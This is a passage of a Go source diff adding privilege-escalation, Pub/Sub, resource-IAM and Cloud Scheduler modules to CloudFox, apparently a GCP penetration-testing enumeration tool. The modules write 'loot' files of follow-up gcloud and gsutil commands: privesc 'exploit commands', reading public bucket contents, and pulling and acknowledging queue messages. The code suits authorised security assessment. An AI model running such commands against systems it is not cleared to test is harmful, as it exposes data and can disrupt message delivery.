len(m.Paths) == 0 { + logger.InfoM("No privilege escalation paths found", 
globals.GCP_PRIVESC_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d privilege escalation path(s)", len(m.Paths)), globals.GCP_PRIVESC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *PrivescModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing privilege escalation in project: %s", projectID), globals.GCP_PRIVESC_MODULE_NAME) + } + + svc := privescservice.New() + paths, err := svc.AnalyzeProjectPrivesc(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, + fmt.Sprintf("Could not analyze privilege escalation in project %s", projectID)) + return + } + + m.mu.Lock() + m.Paths = append(m.Paths, paths...) + for _, path := range paths { + m.addPathToLoot(path) + } + m.mu.Unlock() +} + +func (m *PrivescModule) initializeLootFiles() { + m.LootMap["privesc-exploit-commands"] = &internal.LootFile{ + Name: "privesc-exploit-commands", + Contents: "# GCP Privilege Escalation Exploit Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *PrivescModule) addPathToLoot(path privescservice.PrivescPath) { + m.LootMap["privesc-exploit-commands"].Contents += fmt.Sprintf( + "# Method: %s\n"+ + "# Principal: %s (%s)\n"+ + "# Project: %s\n"+ + "# Target: %s\n"+ + "# Permissions: %s\n"+ + "%s\n\n", + path.Method, + path.Principal, path.PrincipalType, + path.ProjectID, + path.TargetResource, + strings.Join(path.Permissions, ", "), + path.ExploitCommand, + ) +} + +func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Privesc table + // Reads: Source principal can perform action (method) on target resource + header := []string{ + "Project Name", + "Project ID", + "Source Principal", + "Source Principal Type", + "Action (Method)", + "Target Resource", + "Permissions", + } + + var body [][]string + for _, path := range 
m.Paths {
+		body = append(body, []string{
+			m.GetProjectName(path.ProjectID),
+			path.ProjectID,
+			path.Principal,
+			path.PrincipalType,
+			path.Method,
+			path.TargetResource,
+			strings.Join(path.Permissions, ", "),
+		})
+	}
+
+	// Collect loot files
+	var lootFiles []internal.LootFile
+	for _, loot := range m.LootMap {
+		if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") {
+			lootFiles = append(lootFiles, *loot)
+		}
+	}
+
+	tables := []internal.TableFile{}
+	if len(body) > 0 {
+		tables = append(tables, internal.TableFile{
+			Name:   "privesc",
+			Header: header,
+			Body:   body,
+		})
+	}
+
+	output := PrivescOutput{Table: tables, Loot: lootFiles}
+
+	scopeNames := make([]string, len(m.ProjectIDs))
+	for i, id := range m.ProjectIDs {
+		scopeNames[i] = m.GetProjectName(id)
+	}
+
+	err := internal.HandleOutputSmart(
+		"gcp",
+		m.Format,
+		m.OutputDirectory,
+		m.Verbosity,
+		m.WrapTable,
+		"project",
+		m.ProjectIDs, // scope identifiers first, then display names (matches every other module)
+		scopeNames,
+		m.Account,
+		output,
+	)
+	if err != nil {
+		logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PRIVESC_MODULE_NAME)
+	}
+}
diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go
new file mode 100644
index 00000000..555fdd52
--- /dev/null
+++ b/gcp/commands/pubsub.go
@@ -0,0 +1,486 @@
+package commands
+
+import (
+	"context"
+	"fmt"
+	"strings"
+	"sync"
+
+	PubSubService "github.com/BishopFox/cloudfox/gcp/services/pubsubService"
+	"github.com/BishopFox/cloudfox/globals"
+	"github.com/BishopFox/cloudfox/internal"
+	gcpinternal "github.com/BishopFox/cloudfox/internal/gcp"
+	"github.com/spf13/cobra"
+)
+
+var GCPPubSubCommand = &cobra.Command{
+	Use:     globals.GCP_PUBSUB_MODULE_NAME,
+	Aliases: []string{"ps", "topics", "subscriptions"},
+	Short:   "Enumerate Pub/Sub topics and subscriptions with security analysis",
+	Long: `Enumerate Pub/Sub topics and subscriptions across projects with security-relevant details.
+ +Features: +- Lists all Pub/Sub topics and subscriptions +- Shows IAM configuration and public access +- Identifies push endpoints and their configurations +- Shows dead letter topics and retry policies +- Detects BigQuery and Cloud Storage exports +- Generates gcloud commands for further analysis + +Security Columns: +- PublicPublish: Whether allUsers/allAuthenticatedUsers can publish +- PublicSubscribe: Whether allUsers/allAuthenticatedUsers can subscribe +- KMS: Customer-managed encryption key status +- PushEndpoint: External URL receiving messages (data exfiltration risk) +- Exports: BigQuery/Cloud Storage export destinations + +Attack Surface: +- Public topics allow message injection +- Public subscriptions allow message reading +- Push endpoints may leak sensitive data +- Cross-project subscriptions indicate trust relationships`, + Run: runGCPPubSubCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PubSubModule struct { + gcpinternal.BaseGCPModule + + Topics []PubSubService.TopicInfo + Subscriptions []PubSubService.SubscriptionInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PubSubOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PubSubOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PubSubOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPubSubCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PUBSUB_MODULE_NAME) + if err != nil { + return + } + + module := &PubSubModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Topics: []PubSubService.TopicInfo{}, + Subscriptions: []PubSubService.SubscriptionInfo{}, + LootMap: 
make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBSUB_MODULE_NAME, m.processProject) + + totalResources := len(m.Topics) + len(m.Subscriptions) + if totalResources == 0 { + logger.InfoM("No Pub/Sub topics or subscriptions found", globals.GCP_PUBSUB_MODULE_NAME) + return + } + + // Count public resources and push subscriptions + publicTopics := 0 + publicSubs := 0 + pushSubs := 0 + for _, topic := range m.Topics { + for _, binding := range topic.IAMBindings { + if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + publicTopics++ + break + } + } + } + for _, sub := range m.Subscriptions { + for _, binding := range sub.IAMBindings { + if binding.Member == "allUsers" || binding.Member == "allAuthenticatedUsers" { + publicSubs++ + break + } + } + if sub.PushEndpoint != "" { + pushSubs++ + } + } + + msg := fmt.Sprintf("Found %d topic(s), %d subscription(s)", len(m.Topics), len(m.Subscriptions)) + if publicTopics > 0 || publicSubs > 0 { + msg += fmt.Sprintf(" (%d public topics, %d public subs)", publicTopics, publicSubs) + } + if pushSubs > 0 { + msg += fmt.Sprintf(" [%d push endpoints]", pushSubs) + } + logger.SuccessM(msg, globals.GCP_PUBSUB_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PubSubModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Pub/Sub in project: %s", projectID), globals.GCP_PUBSUB_MODULE_NAME) + } + + ps := PubSubService.New() + + // Get topics + topics, err := ps.Topics(projectID) + 
if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, + fmt.Sprintf("Could not enumerate Pub/Sub topics in project %s", projectID)) + } else { + m.mu.Lock() + m.Topics = append(m.Topics, topics...) + for _, topic := range topics { + m.addTopicToLoot(topic) + } + m.mu.Unlock() + } + + // Get subscriptions + subs, err := ps.Subscriptions(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, + fmt.Sprintf("Could not enumerate Pub/Sub subscriptions in project %s", projectID)) + } else { + m.mu.Lock() + m.Subscriptions = append(m.Subscriptions, subs...) + for _, sub := range subs { + m.addSubscriptionToLoot(sub) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d topic(s), %d subscription(s) in project %s", len(topics), len(subs), projectID), globals.GCP_PUBSUB_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PubSubModule) initializeLootFiles() { + m.LootMap["pubsub-commands"] = &internal.LootFile{ + Name: "pubsub-commands", + Contents: "# Pub/Sub Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *PubSubModule) addTopicToLoot(topic PubSubService.TopicInfo) { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "## Topic: %s (Project: %s)\n"+ + "# Subscriptions: %d\n", + topic.Name, topic.ProjectID, + topic.SubscriptionCount, + ) + + if topic.KmsKeyName != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", topic.KmsKeyName) + } + + if len(topic.IAMBindings) > 0 { + m.LootMap["pubsub-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range topic.IAMBindings { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + 
m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "\n# Describe topic:\n"+ + "gcloud pubsub topics describe %s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud pubsub topics get-iam-policy %s --project=%s\n\n"+ + "# List subscriptions:\n"+ + "gcloud pubsub topics list-subscriptions %s --project=%s\n\n"+ + "# Publish a message:\n"+ + "gcloud pubsub topics publish %s --message='test' --project=%s\n\n", + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + topic.Name, topic.ProjectID, + ) +} + +func (m *PubSubModule) addSubscriptionToLoot(sub PubSubService.SubscriptionInfo) { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "## Subscription: %s (Project: %s)\n"+ + "# Topic: %s\n", + sub.Name, sub.ProjectID, + sub.Topic, + ) + + // Cross-project info + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# Cross-Project: Yes (topic in %s)\n", sub.TopicProject) + } + + // Push endpoint info + if sub.PushEndpoint != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "# Push Endpoint: %s\n"+ + "# Push Service Account: %s\n", + sub.PushEndpoint, + sub.PushServiceAccount, + ) + } + + // Export destinations + if sub.BigQueryTable != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# BigQuery Export: %s\n", sub.BigQueryTable) + } + if sub.CloudStorageBucket != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# GCS Export: %s\n", sub.CloudStorageBucket) + } + + // Dead letter config + if sub.DeadLetterTopic != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "# Dead Letter Topic: %s (Max Attempts: %d)\n", + sub.DeadLetterTopic, + sub.MaxDeliveryAttempts, + ) + } + + // IAM bindings + if len(sub.IAMBindings) > 0 { + m.LootMap["pubsub-commands"].Contents += "# IAM Bindings:\n" + for _, binding := range sub.IAMBindings { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, 
binding.Member) + } + } + + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf( + "\n# Describe subscription:\n"+ + "gcloud pubsub subscriptions describe %s --project=%s\n\n"+ + "# Get IAM policy:\n"+ + "gcloud pubsub subscriptions get-iam-policy %s --project=%s\n\n"+ + "# Pull messages:\n"+ + "gcloud pubsub subscriptions pull %s --project=%s --limit=10 --auto-ack\n\n", + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + sub.Name, sub.ProjectID, + ) + + // BigQuery command + if sub.BigQueryTable != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# Query BigQuery export:\nbq show %s\n\n", sub.BigQueryTable) + } + + // GCS command + if sub.CloudStorageBucket != "" { + m.LootMap["pubsub-commands"].Contents += fmt.Sprintf("# List GCS export:\ngsutil ls gs://%s/\n\n", sub.CloudStorageBucket) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PubSubModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Topics table - one row per IAM binding + topicsHeader := []string{ + "Project Name", + "Project ID", + "Topic Name", + "Subscriptions", + "KMS Key", + "Retention", + "IAM Role", + "IAM Member", + } + + var topicsBody [][]string + for _, topic := range m.Topics { + // Format KMS key + kmsKey := "-" + if topic.KmsKeyName != "" { + kmsKey = topic.KmsKeyName + } + + // Format retention + retention := "-" + if topic.MessageRetentionDuration != "" { + retention = topic.MessageRetentionDuration + } + + if len(topic.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range topic.IAMBindings { + topicsBody = append(topicsBody, []string{ + m.GetProjectName(topic.ProjectID), + topic.ProjectID, + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + kmsKey, + retention, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row with empty IAM columns + topicsBody = append(topicsBody, []string{ + m.GetProjectName(topic.ProjectID), + 
topic.ProjectID, + topic.Name, + fmt.Sprintf("%d", topic.SubscriptionCount), + kmsKey, + retention, + "-", + "-", + }) + } + } + + // Subscriptions table - one row per IAM binding + subsHeader := []string{ + "Project Name", + "Project ID", + "Subscription", + "Topic", + "Type", + "Push Endpoint / Export", + "Cross-Project", + "Dead Letter", + "IAM Role", + "IAM Member", + } + + var subsBody [][]string + for _, sub := range m.Subscriptions { + // Determine type + subType := "Pull" + destination := "-" + if sub.PushEndpoint != "" { + subType = "Push" + destination = sub.PushEndpoint + } else if sub.BigQueryTable != "" { + subType = "BigQuery" + destination = sub.BigQueryTable + } else if sub.CloudStorageBucket != "" { + subType = "GCS" + destination = sub.CloudStorageBucket + } + + // Format cross-project + crossProject := "-" + if sub.TopicProject != "" && sub.TopicProject != sub.ProjectID { + crossProject = sub.TopicProject + } + + // Format dead letter + deadLetter := "-" + if sub.DeadLetterTopic != "" { + deadLetter = sub.DeadLetterTopic + } + + if len(sub.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range sub.IAMBindings { + subsBody = append(subsBody, []string{ + m.GetProjectName(sub.ProjectID), + sub.ProjectID, + sub.Name, + sub.Topic, + subType, + destination, + crossProject, + deadLetter, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row with empty IAM columns + subsBody = append(subsBody, []string{ + m.GetProjectName(sub.ProjectID), + sub.ProjectID, + sub.Name, + sub.Topic, + subType, + destination, + crossProject, + deadLetter, + "-", + "-", + }) + } + } + + // Collect loot files - only include if they have content beyond the header + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + 
tableFiles := []internal.TableFile{} + + if len(topicsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-topics", + Header: topicsHeader, + Body: topicsBody, + }) + } + + if len(subsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_PUBSUB_MODULE_NAME + "-subscriptions", + Header: subsHeader, + Body: subsBody, + }) + } + + output := PubSubOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PUBSUB_MODULE_NAME) + m.CommandCounter.Error++ + } +} + + diff --git a/gcp/commands/resourceiam.go b/gcp/commands/resourceiam.go new file mode 100644 index 00000000..ff659376 --- /dev/null +++ b/gcp/commands/resourceiam.go @@ -0,0 +1,343 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + resourceiamservice "github.com/BishopFox/cloudfox/gcp/services/resourceIAMService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPResourceIAMCommand = &cobra.Command{ + Use: globals.GCP_RESOURCEIAM_MODULE_NAME, + Aliases: []string{"resiam", "resource-policies"}, + Short: "Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.)", + Long: `Enumerate IAM policies attached directly to GCP resources. + +This module discovers WHO has access to WHAT resources by enumerating +resource-level IAM policies (not just project-level policies). 
+ +Supported Resource Types: +- Cloud Storage buckets +- BigQuery datasets +- Pub/Sub topics and subscriptions +- Secret Manager secrets +- Cloud KMS keys +- Cloud Functions +- Cloud Run services + +Key Findings: +- Public access (allUsers/allAuthenticatedUsers) +- Cross-project access patterns +- Overly permissive roles on sensitive resources +- Federated identity access to resources`, + Run: runGCPResourceIAMCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ResourceIAMModule struct { + gcpinternal.BaseGCPModule + + Bindings []resourceiamservice.ResourceIAMBinding + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ResourceIAMOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ResourceIAMOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ResourceIAMOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPResourceIAMCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_RESOURCEIAM_MODULE_NAME) + if err != nil { + return + } + + module := &ResourceIAMModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Bindings: []resourceiamservice.ResourceIAMBinding{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ResourceIAMModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating resource-level IAM policies...", globals.GCP_RESOURCEIAM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_RESOURCEIAM_MODULE_NAME, m.processProject) + + if 
len(m.Bindings) == 0 { + logger.InfoM("No resource IAM bindings found", globals.GCP_RESOURCEIAM_MODULE_NAME) + return + } + + // Count statistics + publicCount := 0 + resourceTypes := make(map[string]int) + for _, b := range m.Bindings { + resourceTypes[b.ResourceType]++ + if b.IsPublic { + publicCount++ + } + } + + // Build summary + var typeSummary []string + for rt, count := range resourceTypes { + typeSummary = append(typeSummary, fmt.Sprintf("%d %s(s)", count, rt)) + } + + logger.SuccessM(fmt.Sprintf("Found %d resource IAM binding(s): %s", + len(m.Bindings), strings.Join(typeSummary, ", ")), globals.GCP_RESOURCEIAM_MODULE_NAME) + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d PUBLIC resource binding(s)!", publicCount), globals.GCP_RESOURCEIAM_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ResourceIAMModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating resource IAM in project: %s", projectID), globals.GCP_RESOURCEIAM_MODULE_NAME) + } + + svc := resourceiamservice.New() + bindings, err := svc.GetAllResourceIAM(ctx, projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_RESOURCEIAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate resource IAM in project %s", projectID)) + return + } + + m.mu.Lock() + m.Bindings = append(m.Bindings, bindings...) 
+ + // Generate loot for public resources + for _, b := range bindings { + if b.IsPublic { + m.addPublicResourceToLoot(b) + } + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d resource IAM binding(s) in project %s", len(bindings), projectID), globals.GCP_RESOURCEIAM_MODULE_NAME) + } +} + +// ------------------------------ +// Loot Management +// ------------------------------ +func (m *ResourceIAMModule) initializeLootFiles() { + m.LootMap["resource-iam-commands"] = &internal.LootFile{ + Name: "resource-iam-commands", + Contents: "# Resource IAM Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["public-resources"] = &internal.LootFile{ + Name: "public-resources", + Contents: "# Public Resources\n# Generated by CloudFox\n# These resources have allUsers or allAuthenticatedUsers access!\n\n", + } +} + +func (m *ResourceIAMModule) addPublicResourceToLoot(b resourceiamservice.ResourceIAMBinding) { + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "# %s: %s\n# Member: %s, Role: %s\n", + b.ResourceType, b.ResourceName, b.Member, b.Role, + ) + + // Add exploitation commands based on resource type + switch b.ResourceType { + case "bucket": + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "gsutil ls %s\ngsutil cat %s/*\n\n", + b.ResourceName, b.ResourceName, + ) + case "function": + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "# Function may be publicly invokable\ngcloud functions describe %s --project=%s\n\n", + b.ResourceID, b.ProjectID, + ) + case "cloudrun": + m.LootMap["public-resources"].Contents += fmt.Sprintf( + "# Cloud Run service may be publicly accessible\ngcloud run services describe %s --project=%s\n\n", + b.ResourceID, b.ProjectID, + ) + } +} + +// resourceKey creates a unique key for a resource to group bindings +func resourceKey(b resourceiamservice.ResourceIAMBinding) string { + return fmt.Sprintf("%s|%s|%s", b.ProjectID, b.ResourceType, b.ResourceName) 
+} + +// shortenRole extracts a readable role name from the full role path +func shortenRole(role string) string { + // roles/storage.objectViewer -> objectViewer + // projects/xxx/roles/customRole -> customRole + if idx := strings.LastIndex(role, "/"); idx != -1 { + return role[idx+1:] + } + return role +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ResourceIAMModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project ID", + "Resource Type", + "Resource ID", + "Resource Name", + "Public", + "Access (memberType:member [role])", + "Condition", + } + + // Group bindings by resource + resourceBindings := make(map[string][]resourceiamservice.ResourceIAMBinding) + resourceOrder := []string{} // Maintain order + for _, b := range m.Bindings { + key := resourceKey(b) + if _, exists := resourceBindings[key]; !exists { + resourceOrder = append(resourceOrder, key) + } + resourceBindings[key] = append(resourceBindings[key], b) + } + + var body [][]string + for _, key := range resourceOrder { + bindings := resourceBindings[key] + if len(bindings) == 0 { + continue + } + + // Use first binding for resource info + first := bindings[0] + + // Check if any binding is public + isPublic := "No" + for _, b := range bindings { + if b.IsPublic { + isPublic = "Yes" + break + } + } + + // Build access list: one line per entity "memberType:member [role]" + var accessList []string + var conditionList []string + for _, b := range bindings { + // Format: memberType:member [shortRole] + member := b.MemberEmail + if member == "" { + member = b.Member + } + memberType := strings.ToLower(b.MemberType) + role := shortenRole(b.Role) + + entry := fmt.Sprintf("%s:%s [%s]", memberType, member, role) + accessList = append(accessList, entry) + + // Collect condition expressions + if b.HasCondition && b.ConditionExpression != "" { + condEntry := b.ConditionExpression + if b.ConditionTitle != "" { + 
condEntry = fmt.Sprintf("%s: %s", b.ConditionTitle, b.ConditionExpression) + } + // Avoid duplicates + found := false + for _, existing := range conditionList { + if existing == condEntry { + found = true + break + } + } + if !found { + conditionList = append(conditionList, condEntry) + } + } + } + + condition := "-" + if len(conditionList) > 0 { + condition = strings.Join(conditionList, "\n") + } + + body = append(body, []string{ + first.ProjectID, + first.ResourceType, + first.ResourceID, + first.ResourceName, + isPublic, + strings.Join(accessList, "\n"), + condition, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") && + !strings.HasSuffix(loot.Contents, "# These resources have allUsers or allAuthenticatedUsers access!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "resource-iam", + Header: header, + Body: body, + }, + } + + output := ResourceIAMOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + []string{}, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_RESOURCEIAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go new file mode 100644 index 00000000..19bc1619 --- /dev/null +++ b/gcp/commands/scheduler.go @@ -0,0 +1,325 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + SchedulerService "github.com/BishopFox/cloudfox/gcp/services/schedulerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSchedulerCommand = &cobra.Command{ + 
Use: globals.GCP_SCHEDULER_MODULE_NAME, + Aliases: []string{"cron", "jobs"}, + Short: "Enumerate Cloud Scheduler jobs with security analysis", + Long: `Enumerate Cloud Scheduler jobs across projects with security-relevant details. + +Features: +- Lists all Cloud Scheduler jobs +- Shows target configuration (HTTP, Pub/Sub, App Engine) +- Identifies service accounts used for authentication +- Shows schedule (cron) expressions +- Displays job state and last execution status +- Generates gcloud commands for job manipulation + +Security Columns: +- Target: HTTP endpoint, Pub/Sub topic, or App Engine service +- ServiceAccount: Identity used when invoking targets +- Schedule: When the job runs (cron expression) +- State: ENABLED, PAUSED, or DISABLED + +Attack Surface: +- HTTP targets may call internal or external endpoints +- Service accounts may have excessive permissions +- Jobs can be modified to call attacker-controlled endpoints +- Paused jobs may indicate suspended malicious activity`, + Run: runGCPSchedulerCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SchedulerModule struct { + gcpinternal.BaseGCPModule + + Jobs []SchedulerService.JobInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SchedulerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SchedulerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SchedulerOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSchedulerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SCHEDULER_MODULE_NAME) + if err != nil { + return + } + + module := &SchedulerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Jobs: 
[]SchedulerService.JobInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SCHEDULER_MODULE_NAME, m.processProject) + + if len(m.Jobs) == 0 { + logger.InfoM("No Cloud Scheduler jobs found", globals.GCP_SCHEDULER_MODULE_NAME) + return + } + + // Count job states + enabledCount := 0 + httpCount := 0 + for _, job := range m.Jobs { + if job.State == "ENABLED" { + enabledCount++ + } + if job.TargetType == "http" { + httpCount++ + } + } + + msg := fmt.Sprintf("Found %d job(s)", len(m.Jobs)) + if enabledCount > 0 { + msg += fmt.Sprintf(" [%d enabled]", enabledCount) + } + if httpCount > 0 { + msg += fmt.Sprintf(" [%d HTTP targets]", httpCount) + } + logger.SuccessM(msg, globals.GCP_SCHEDULER_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SchedulerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Scheduler jobs in project: %s", projectID), globals.GCP_SCHEDULER_MODULE_NAME) + } + + ss := SchedulerService.New() + + jobs, err := ss.Jobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SCHEDULER_MODULE_NAME, + fmt.Sprintf("Could not enumerate Scheduler jobs in project %s", projectID)) + return + } + + m.mu.Lock() + m.Jobs = append(m.Jobs, jobs...) 
